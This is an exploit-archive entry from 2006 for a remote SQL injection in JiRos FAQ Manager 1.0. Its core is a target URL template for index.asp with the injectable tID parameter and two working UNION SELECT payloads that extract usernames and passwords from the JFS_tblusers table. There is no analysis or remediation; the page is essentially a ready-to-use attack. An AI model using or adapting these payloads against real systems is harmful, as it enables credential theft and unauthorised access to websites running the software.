[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : JiRos FAQ Manager 1.0 (index.asp) Remote SQL Injection Vulnerability
# Published : 2006-11-23
# Author : ajann
# Previous Title : Wallpaper Complete Website 1.0.09 Remote SQL Injection Vulnerabilities
# Next Title : HSRS 1.0 (addcode.php) Remote File Include Vulnerability
*******************************************************************************
# Title : JiRo¡äs FAQ Manager v1.0 (index.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
*******************************************************************************
###http://[target]/[path]//index.asp?tID=[SQL]
Example:
//index.asp?tID=-1%20union%20select%200,uPassword,0,0,0,0,0,0,0,0,0,0,0,0%20from%20JFS_tblusers%20where%20no%20like%200
//index.asp?tID=-1%20union%20select%200,uName,0,0,0,0,0,0,0,0,0,0,0,0%20from%20JFS_tblusers%20where%20no%20like%200
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# www.Syue.com [2006-11-23]